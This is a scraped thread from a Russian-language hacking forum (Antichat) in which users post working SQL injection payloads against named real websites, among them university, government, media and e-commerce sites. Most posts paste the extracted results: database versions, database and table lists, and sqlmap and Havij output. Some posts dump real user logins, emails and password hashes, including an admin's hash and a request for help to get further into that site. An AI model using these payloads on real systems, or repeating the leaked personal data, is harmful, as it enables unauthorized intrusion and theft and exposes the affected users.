SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    Выжимал "максимум" с error based )) от потенциальной уязвимости до начала дампа за ~5 запросов))

    Code:
    URL: http://2c5whdbcb6m2c2xx.onion/search/1%27%29%09and%09%28%28SELECT%09%28i%09IS%09NOT%09NULL%29%09-%09-9223372036854775808%09FROM%09%28SELECT%09%28concat%28version%28%29%29%29i%29a%29%29=2--%09
    version() = 5.5.43-0+deb7u1


    Code:
    URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
    POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x3a,substr(@,1,400),0x7d7d7d))i)a)&url=%2Fproducts%2F7
    
    


    Code:
    URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
    POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,((select length((SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.tables WHERE table_schema!="information_schema" and @:=CONCAT(@,0x2C,CONCAT(table_name))),@),5))))),0x3a,substr(@,300,700),0x7d7d7d))i)a)&url=%2Fproducts%2F7
    
    


    Результат(имена таблиц в hoursppc_biznewenc):
    Code:
    addressbook
    allorg_orders
    best5
    blog_commentmeta
    blog_comments
    blog_links
    blog_options
    blog_postmeta
    blog_posts
    blog_term_relationships
    blog_term_taxonomy
    blog_terms
    blog_usermeta
    blog_users
    bonus_types
    bonuses
    categories
    cats_of_groups
    contacts_block
    countries
    coupons
    currancies
    domains
    domains2
    emails
    fake_products
    global
    groups
    images
    langs
    login
    messages
    news
    old_orders
    old_users
    old_users2orders
    order_discounts
    order_items
    order_statuses
    orders
    org_orders
    pages
    payments
    pro_orders
    products
    real2fake
    serialize_data
    settings
    shippings
    single
    states
    storages
    texts
    ticket_action
    ticket_notify
    ticket_settings
    ticket_ticket
    ticket_ticket_bak
    ticket_user
    users
    users2orders
    users_anabol
    warns
    

    Code:
    URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
    POSTDATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(SELECT MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' and @:=CONCAT(@,0x2C,CONCAT(column_name))),@),5)),0x7d7d7d))i)a)&url=%2Fproducts%2F7
    
    Результат(имена колонок в hoursppc_biznewenc.users):
    Code:
    id
    login
    password
    name
    address
    city
    zip
    country
    state
    email
    phone
    discount
    added
    lastvisit
    status
    canUpgrade
    comments
    is_active
    md5Password
    old_orders_count
    old_orders_numbers
    terms
    active
    history
    refer
    


    Code:
    URL: http://2c5whdbcb6m2c2xx.onion/add_to_cart
    POST DATA: quant=1&id=(188)or(SELECT (i IS NOT NULL) - -9223372036854775808 FROM (SELECT (concat(0x7b7b7b,(select length(MID(CONCAT(@:=0x20,(SELECT COUNT(*) FROM users WHERE @:=CONCAT(@,0x2C,CONCAT(login,0x3b,email,0x3b,password))),@),5))),0x3a,(SELECT mid(@,1,400)),0x7d7d7d))i)a)&url=%2Fproducts%2F7
    


    Результат (обрывок от select concat(login,0x3b,email,0x3b,password) from hoursppc_biznewenc.users):
    Code:
    Neval;chuvyrlo@gmail.com;da3f50400551551ea03382ac7c3bfa587f789b68
    tjoxvic;tjoxvic@gmail.com;da3f50400551551ea03382ac7c3bfa587f789b68
    daniel middleton;daniel.middleton@afg.usmc.mil;da3f50400551551ea03382ac7c3bfa587f789b68
    baddscorp;baddscorp@aol.com;da3f50400551551ea03382ac7c3bfa587f789b68
    luga888;luga888@live.com;da3f50400551551ea03382ac7c3bfa587f789b68
    mike6484;mike7542@comcast.net;da3f50400551
    
     
    #21 psihoz26, 8 Jun 2015
    Last edited: 8 Jun 2015
    MKaRealize4, Take_IT, BigBear and 2 others like this.
  2. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    Code:
    http://forums.sbo.sailboatowners.com/q_login.php?do=login
    POST
    redirect=http%3A%2F%2Fsbo.sailboatowners.com%2Findex.php%3Foption%3Dcom_content%26task%3Dview%26id%3D30%26Itemid%3D64&vb_login_username=asfasf'or(ExtractValue(1,concat(0x3a,(select+user()))))='1&vb_login_password=asfasf&cookieuser=1&image.x=0&image.y=0&s=&do=login&vb_login_md5password=0a040ec34abbfb7f3030345244a913c9&vb_login_md5password_utf=0a040ec34abbfb7f3030345244a913c9

    Интегрированый вб в жумлу, везде попрятаны админки и т.п, но все ищется и льется :). Мб кому интересно будет попробовать
     
    #22 Br@!ns, 9 Jun 2015
    Last edited by a moderator: 23 Jul 2015
  3. huntercs16

    huntercs16 Member

    Joined:
    7 Oct 2013
    Messages:
    138
    Likes Received:
    14
    Reputations:
    6
    Code:
    https://blogs.adobe.com/adobelife/photos/?gid=-1+/*!uNIoN*/+(/*!SelEcT*/+1,1,1,concat(0x3a3a3a3a3a,database(),0x3a3a3a3a3a)+)+--+;
    wp стоит
     
    #23 huntercs16, 9 Jun 2015
    Last edited by a moderator: 23 Jul 2015
  4. nikonic

    nikonic New Member

    Joined:
    29 May 2015
    Messages:
    43
    Likes Received:
    4
    Reputations:
    7
    КАМЧАТСКИЙ НАУЧНЫЙ ЦЕНТР
    Code:
    http://www.kscnet.ru/ivs/kvert/volc.php?lang=en&name=99999'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),14,15,16,17,18,19,20+--+
    тиц 750 пр 5
    5.5.30-log
     
  5. 3nvY

    3nvY Member

    Joined:
    8 Jun 2015
    Messages:
    46
    Likes Received:
    17
    Reputations:
    10
    SQLi:
    Code:
    http://boroughs.org/subpage.php?link=Borough-News-Magazine'+AND+1=0+UNION+ALL+SELECT+1,2,3,4,5,concat_ws(0x3b3c62723e,database(),user(),version(),@@version_compile_os),7,8,9,10,11+--+
     
  6. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    [​IMG]
    Code:
    http://sanpid.com/index.php?page=1&cid=220&pid=-371+union+Select+version%28%29+--+
    Версия: 5.0.96-community-log
     
  7. 3nvY

    3nvY Member

    Joined:
    8 Jun 2015
    Messages:
    46
    Likes Received:
    17
    Reputations:
    10
    SQLi:

    Code:
    http://www.rnd.goa.gov.in/content_news_disp.php?id=-14+union+select+1,2,3,4,CONCAT_WS%280x3b3c62723e,user%28%29,version%28%29,database%28%29,@@version_compile_os%29,6,7,8,9,10,11+--+
    rnd@localhost; 5.6.22; rnd
     
    YaBtr likes this.
  8. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,099
    Likes Received:
    792
    Reputations:
    230
    Code:
    http://pr.alexa.cn/index.php?url=1' OR EXTRACTVALUE(8396,CONCAT(0x5c,0x716a787171,(SELECT (ELT(8396=8396,1))),0x7171787671)) AND 'BvUT'='BvUT
    alexa.cn трафф 590к
    error-based
    hostname: 'AY12063001214105c7538'
    'root'@'127.0.0.1'
    Nginx, PHP 5.4.37, MySQL >= 5.0.0
    BD list:
    alexa

    icpdb
    information_schema
    mysql
    performance_schema
    test
    tour2013
    whoisdb
    xj_cn_2014
     
    _________________________
  9. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,099
    Likes Received:
    792
    Reputations:
    230
    Code:
    http://leton.tv/player.php?streampage=tnj1bde' AND (SELECT 4549 FROM(SELECT COUNT(*),CONCAT(0x716a717671,(SELECT (ELT(4549=4549,1))),0x716a6b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Iimq'='Iimq&width=600&height=450
    leton.tv трафф 1.6kk сервис стримингово видео
    error based
    PHP 5.3.3, Nginx, MySQL >= 5.0.0
    DBA: True

    hostname: 'hostname.change.me'
    ''@'hostname.change.me'
    ''@'localhost'
    'root'@'127.0.0.1'
    'root'@'hostname.change.me'
    'root'@'localhost'
    DB list:
    information_schema
    megom
    mysql
    scorenews
    test
    wowza
    wowza2
    wowza2_b1
     
    _________________________
    spherics, ChymeNik and YaBtr like this.
  10. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,099
    Likes Received:
    792
    Reputations:
    230
    cashbackmonitor.com трафф 430к сравнение шопов
    Code:
    Parameter: #1* (URI)[/COLOR][/COLOR][/COLOR][/COLOR]
    [COLOR=#80ff00][COLOR=#ff0000][COLOR=#ff4d4d][COLOR=#bfbfbf]  AND boolean-based blind - WHERE or HAVING clause
        Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND 2703=2703 AND 'nUyh'='nUyh
    
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' AND (SELECT 2579 FROM(SELECT COUNT(*),CONCAT(0x716a627671,(SELECT (ELT(2579=2579,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'hlmZ'='hlmZ
    
        Title: Generic UNION query (NULL) - 22 columns
        Payload: http://www.cashbackmonitor.com/Cashback-Comparison/1/?sub=g' UNION ALL SELECT NULL,CONCAT(0x716a627671,0x4647646f4f536d657563,0x7178787071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

    web server operating system: Linux Red Hat Enterprise 6 (Santiago)
    web application technology: PHP 5.3.3, Apache 2.2.15
    back-end DBMS: MySQL >= 5.0.0
    available databases [3]:
    [*] CashbackMonitor
    [*] information_schema
    [*] test

    -------------------------------------------------------------
    sydney.edu.au трафф 2.2kк
    Code:
        Type: error-based[/B][/COLOR][/B][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR]
    [COLOR=#80ff00][COLOR=#ff0000][COLOR=#ff4d4d][COLOR=#bfbfbf][COLOR=#80ff00][B][COLOR=#ff4d4d][B]    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
        Payload: http://sydney.edu.au:80/medicine/public-health/research/publications.php?year=2010' AND (SELECT 5421 FROM(SELECT COUNT(*),CONCAT(0x716a6a7871,(SELECT (ELT(5421=5421,1))),0x716a7a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'sBCP'='sBCP

    web server operating system: Linux Red Hat Enterprise 5 (Tikanga)
    web application technology: Apache 2.2.3, PHP 5.1.6
    back-end DBMS: MySQL >= 5.0.0
    available databases [266]:
    Code:
    [*] acaorn[/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR][/COLOR]
    [COLOR=#80ff00][COLOR=#ff0000][COLOR=#ff4d4d][COLOR=#bfbfbf][COLOR=#80ff00][COLOR=#ff4d4d][COLOR=#bfbfbf][*] acaorn_wikidb
    [*] adri
    [*] anzacdb
    [*] appan
    [*] brainprofiling
    [*] cancer_sphider
    [*] cancerlearning
    [*] cancerlearning_tw
    [*] cards
    [*] cera
    [*] cl_resources
    [*] cl_surveys
    [*] cl_tw
    [*] clphpbb
    [*] ctc
    [*] ctctest
    [*] database
    [*] drh
    [*] elgg
    [*] emergency
    [*] eventsdb_dent
    [*] ex_allprofiles
    [*] ex_bdent
    [*] ex_bmri
    [*] ex_boh
    [*] ex_bond
    [*] ex_bond-post-upgrade
    [*] ex_bond_2005dev
    [*] ex_bond_after_upgrade
    [*] ex_bond_stage3-4
    [*] ex_bond_stage3_4
    [*] ex_bosch
    [*] ex_boschtest
    [*] ex_cirus
    [*] ex_cmsapitest
    [*] ex_cmsapitestreprox
    [*] ex_ctc
    [*] ex_dentistry
    [*] ex_devhealth
    [*] ex_global_health
    [*] ex_health
    [*] ex_kolling
    [*] ex_kollingfoundation
    [*] ex_medsci
    [*] ex_ncsc
    [*] ex_pharmacology
    [*] ex_pharmacy
    [*] ex_pharmold
    [*] ex_physiology
    [*] ex_proxyacaorn
    [*] ex_proxyaddiction
    [*] ex_proxyalumni
    [*] ex_proxyanatomy
    [*] ex_proxyapnet
    [*] ex_proxybmri
    [*] ex_proxybosch
    [*] ex_proxybsim
    [*] ex_proxycancerresearch
    [*] ex_proxycentral
    [*] ex_proxychw
    [*] ex_proxyconcord
    [*] ex_proxycoo
    [*] ex_proxycoppleson
    [*] ex_proxycpah
    [*] ex_proxydiabetes
    [*] ex_proxydrh
    [*] ex_proxyeye
    [*] ex_proxyfmrc
    [*] ex_proxyforensic
    [*] ex_proxygeneralpractice
    [*] ex_proxygenetic
    [*] ex_proxyglobalhealth
    [*] ex_proxyhealth
    [*] ex_proxyhocmai
    [*] ex_proxyimaging
    [*] ex_proxymeddiscipline
    [*] ex_proxymedfac
    [*] ex_proxymedfacfull
    [*] ex_proxymedfound
    [*] ex_proxymedicalfoundation
    [*] ex_proxymedicalhumanities
    [*] ex_proxymedsci
    [*] ex_proxymuseumtest
    [*] ex_proxynepean
    [*] ex_proxynmrf
    [*] ex_proxynorthern
    [*] ex_proxynrf
    [*] ex_proxyobsgynneo
    [*] ex_proxyome
    [*] ex_proxyopme
    [*] ex_proxypathology
    [*] ex_proxypharmacology
    [*] ex_proxyphysiology
    [*] ex_proxypmri
    [*] ex_proxypoche
    [*] ex_proxyprofiles
    [*] ex_proxyproteomics
    [*] ex_proxypsych
    [*] ex_proxyresearchteams
    [*] ex_proxyrural
    [*] ex_proxyseib
    [*] ex_proxystirc
    [*] ex_proxysurgery
    [*] ex_proxyvelim
    [*] ex_proxyvideoconf
    [*] ex_proxywestern
    [*] ex_proxywestmead
    [*] fhbc
    [*] ht_-v
    [*] ht_acaorn
    [*] ht_acaorntest
    [*] ht_addiction
    [*] ht_addictiontest
    [*] ht_agingbonetest
    [*] ht_anaes
    [*] ht_anatomytest
    [*] ht_apnet
    [*] ht_apnettest
    [*] ht_avit
    [*] ht_avittest
    [*] ht_bdent
    [*] ht_bmri
    [*] ht_bmritest
    [*] ht_bosch
    [*] ht_bosch_old
    [*] ht_bsim
    [*] ht_bsimtest
    [*] ht_cancerlearning
    [*] ht_cancerresearch
    [*] ht_cancerresearchtest
    [*] ht_central
    [*] ht_centraltest
    [*] ht_cochrane-renal
    [*] ht_concord
    [*] ht_concordtest
    [*] ht_cootest
    [*] ht_coppleson
    [*] ht_cpahtest
    [*] ht_ctc
    [*] ht_dentistry
    [*] ht_dentistrytest
    [*] ht_dermatology
    [*] ht_dermatologytest
    [*] ht_drh
    [*] ht_drhtest
    [*] ht_exambank
    [*] ht_forensic
    [*] ht_forensictest
    [*] ht_genetic
    [*] ht_genetictest
    [*] ht_globalhealthtest
    [*] ht_gmp
    [*] ht_gp
    [*] ht_gptest
    [*] ht_health
    [*] ht_healthbook
    [*] ht_healthbooktest
    [*] ht_healthtest
    [*] ht_hocmai
    [*] ht_hocmaitest
    [*] ht_imagingtest
    [*] ht_jira
    [*] ht_jmo
    [*] ht_kidsresearch
    [*] ht_kidsresearchtest
    [*] ht_kolling
    [*] ht_kollingtest
    [*] ht_localhost
    [*] ht_medfac
    [*] ht_medfactest
    [*] ht_medicalfoundation
    [*] ht_medicalfoundationtest
    [*] ht_medicalhumanities
    [*] ht_medicalhumanitiestest
    [*] ht_medicine
    [*] ht_medicinetest
    [*] ht_medsci
    [*] ht_medscitest
    [*] ht_mga
    [*] ht_mgatest
    [*] ht_nbrc
    [*] ht_nbrctest
    [*] ht_ncirs
    [*] ht_ncirstest
    [*] ht_ncsc
    [*] ht_nepean
    [*] ht_nepeantest
    [*] ht_neurologicalsigns
    [*] ht_northern
    [*] ht_northerntest
    [*] ht_nrf
    [*] ht_nrftest
    [*] ht_obsgynneo
    [*] ht_obsgynneotest
    [*] ht_ome
    [*] ht_ometest
    [*] ht_opme
    [*] ht_opmetest
    [*] ht_ovarian
    [*] ht_paediatrics
    [*] ht_paediatricstest
    [*] ht_pathologytest
    [*] ht_pharmacologytest
    [*] ht_physiology
    [*] ht_physiologytest
    [*] ht_poche
    [*] ht_pochetest
    [*] ht_psych
    [*] ht_psychtest
    [*] ht_pubhealth
    [*] ht_rural
    [*] ht_ruraltest
    [*] ht_scssc
    [*] ht_scssctest
    [*] ht_smokecheck
    [*] ht_smokechecktest
    [*] ht_stirc
    [*] ht_stirctest
    [*] ht_surgery
    [*] ht_surgerytest
    [*] ht_velim
    [*] ht_velimtest
    [*] ht_western
    [*] ht_westerntest
    [*] htcheck
    [*] infdisimmunologytest
    [*] information_schema
    [*] kolling
    [*] kollingaccess
    [*] kollinglive
    [*] limesurvey
    [*] limesurvey2
    [*] medicaldeanstestwp
    [*] medicaldeanswp
    [*] medsoc
    [*] moodle
    [*] moodle_cancer
    [*] mysql
    [*] nbcc
    [*] neurosigns
    [*] nmrf
    [*] orsee
    [*] pathologytest
    [*] pgau
    [*] phpesp
    [*] pmri
    [*] pmritest
    [*] proceduresmanual
    [*] publichealth
    [*] rehab
    [*] simrob_obs
    [*] ss
    [*] surgsoc
    [*] test
    [*] vmaillogin
    [*] wikibmri
    [*] wikicompass
    [*] wikidb
    [*] wikidevteam
    [*] wikifacmuseumtest
    [*] wikimedadminpedia
    [*] wikimediabank
    [*] wikiorrtmanual
    [*] wikioverseascahpedia
    [*] wpmysql
    
     
    _________________________
    #30 grimnir, 25 Jun 2015
    Last edited by a moderator: 25 Jun 2015
  11. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,099
    Likes Received:
    792
    Reputations:
    230
    Code:
    https://www.tcd.ie/irishfilm/print.php?search=keyword&q=radharc&exactMatch=&extraSearch=-8628 OR 1 GROUP BY CONCAT(0x716b716271,(SELECT (CASE WHEN (2226=2226) THEN 1 ELSE 0 END)),0x7170787871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    tcd.ie трафф 1.2kk колледж Ирландии
    error based
    Apache 2.4.10;MySQL >= 5.0.0
    Database: filmresearch_db
    [6 tables]
    +-----------------+
    | bibliography |
    | biography |
    | censor_appeal |
    | censor_decision |
    | censor_film |
    | film |
    +-----------------+


    Code:
    http://bgequipment.powweb.com:80/service_detail.php?ID=1' AND (SELECT 1856 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(1856=1856,1))),0x7176716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GkPg'='GkPg
    powweb.com трафф разный
    error based
    PHP 5.3.29, Apache 2;MySQL >= 5.0.0
    available databases [2]:
    [*] bges
    [*] information_schema
     
    _________________________
  12. 3nvY

    3nvY Member

    Joined:
    8 Jun 2015
    Messages:
    46
    Likes Received:
    17
    Reputations:
    10
    Code:
    http://rid.waipadc.govt.nz/cemetery/cemetery_record_view.php?id=-2774+union+select+1,concat_ws%280x3c62723e,version%28%29,database%28%29,user%28%29%29,NULL,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
    cemetery@aoraki.webbase.net.nz;
    5.0.51a-24+lenny5-log;
    cemetery
     
  13. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,777
    Likes Received:
    848
    Reputations:
    857
    Code:
    http://www.polarview.aq/old/tablelisting_SAR.php?hemi=S&time=Last+week&area=NewZealand'+and+ascii(substr(version(),6,1))>'113'+and+concat(1,1,1)='111
    Ничего интересного, просто "обычная" PostgreSQL инъекция на одном из сайтов Антарктиды. Проходите дальше.
     
    _________________________
    frank likes this.
  14. ocheretko

    ocheretko Banned

    Joined:
    15 May 2010
    Messages:
    151
    Likes Received:
    51
    Reputations:
    116
    ASP, MS-SQL
    Тип атаки: Convert INT ODBC Error
    Code:
    Версия - http://nchla.org/issues.asp?ID=1+and+1=convert(int,@@version)--
    Code:
    Пользователь http://nchla.org/issues.asp?ID=1+and+1=convert(int,user_name())--
    Code:
    База данных http://nchla.org/issues.asp?ID=1+and+1=convert(int,db_name())--
    Code:
    Перебираем имена баз данных
    http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(0))--
    http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(1))--
    http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(2))--
    http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(3))--
    http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(4))--
    http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(5))--
    
    Ну и дамп
    [​IMG]
     
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,785
    Likes Received:
    399
    Reputations:
    230
    PR7
    Code:
    http://www7.inra.fr/drh/cr2013/listeparconcours-cr2.php?choix=8&langue=FR+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
     
    #35 DezMond™, 10 Jul 2015
    Last edited by a moderator: 23 Jul 2015
  16. Mister_Bert0ni

    Mister_Bert0ni Reservists Of Antichat

    Joined:
    10 May 2015
    Messages:
    142
    Likes Received:
    189
    Reputations:
    57
    Code:
    http://www.compactkitchens.in/productdetail.php?cat_id=.37' and @pipka:=(
    (SELECT+GROUP_CONCAT(/*!12345table_name*/,0x2020203a3a3a2020,/*!12345column_name*/+SEPARATOR+0x3c62723e)+FROM+
    /*!50000INFORMATION_SCHEMA.columns*/+WHERE+TABLE_SCHEMA=DATABASE/**/()))/*!50000UNIOn*/ SELECT 1,2,3,4,5,6,
    concat/**/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,
    0x4461746162617365203a3a202020,DATABASE/**/(),
    0x3c62723e506f727420203a3a2020,@@PORT,
    0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,
    @@VERSION_COMPILE_MACHINE,
    0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version/**/(),0xa3c62723e486f73746e616d65203a3a20,
    @@HOSTNAME,
    0x3c2f7370616e3e,@pipka),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -
    Code:
    http://www.ilovemusica.com/shop.php?cat=.6 UNION SELECT concat(0x3c2f7469746c653e,0x3c63656e7465723e,
    0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,
    0x4461746162617365203a3a202020,DATABASE(),
    0x3c62723e506f727420203a3a2020,@@PORT,
    0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,
    @@VERSION_COMPILE_MACHINE,
    0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,
    @@HOSTNAME,
    0x3c2f7370616e3e,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x3c212d2d),null -- -
     
    #36 Mister_Bert0ni, 16 Jul 2015
    Last edited by a moderator: 16 Jul 2015
  17. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Еще...
    Вывод в алерте

    Code:
    http://www.agriagency.com.ua/comments/10227.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
     
    _________________________
    #37 kingbeef, 19 Jul 2015
    Last edited by a moderator: 23 Jul 2015
  18. KIR@PRO

    KIR@PRO Active Member

    Joined:
    26 Dec 2007
    Messages:
    823
    Likes Received:
    287
    Reputations:
    359
    ВНИМАНИЕ !!! Все инъекции заключаем в тег [ CODE ] [ / CODE ], ни каких [ URL ] [ / URL ] быть не должно.


    Инъекции в POST выкладываем тоже в [ CODE ] [ /CODE ]
    Code:
    http://site.zone/index.php?cmd=viewpost
    POST:
    id=-1'+and+1=2+union+select+1,2,3,4,5,version(),7,8+--+

    Текст в [ URL ] [ /URL ] урезается по длинне и становится не удобным для чтения, в отличии от [ CODE] [ /CODE ]
     
    _________________________
    #38 KIR@PRO, 23 Jul 2015
    Last edited: 23 Jul 2015
    YaBtr and grimnir like this.
  19. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    Code:
     http://www.tv3.ie/news_sub_page.php?locID=1.2.888000+union+select+concat_ws(0x3a3a,version(),user(),database())-- 
    Version: 5.0.95-log
    user : tv3_readonly@localhost
    database: tv3
     
    KIR@PRO and YaBtr like this.
  20. goot

    goot New Member

    Joined:
    25 Mar 2013
    Messages:
    3
    Likes Received:
    2
    Reputations:
    5
    Привет все!
    Дырка есть базу выдает но там joomla 3.3.1 хеш с солью высыпает
    И фильтр не пропускает логин админа(((
    Code:
    http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'
    Там только перебор бессмысленный сразу инжектировать нужно
    Я через софт Havij v1.16 скачал базу
    Code:
    Target:         http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%
    Host IP:        91.236.136.194
    Web Server:     nginx
    DB Server:     MySQL error based
    Resp. Time(avg):    85 ms
    Sql Version:     5.5.43-0+deb7u1-log
    Compile OS:     debian-linux-gnu
    Host Name:     ura.webhost1.ru
    Current DB:     sergei62_og
    Installation dir:     /usr
    
    данные админа
    povar.admin@gmail.com
    $2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO

    Залить не получилось(( не нашел пути

    Кто сможет раскопать отпишите в личку (Как удалось?)

    P.S. на сервере фильтрация на количество запросов в минуту! Так что не спишите)))
     
Loading...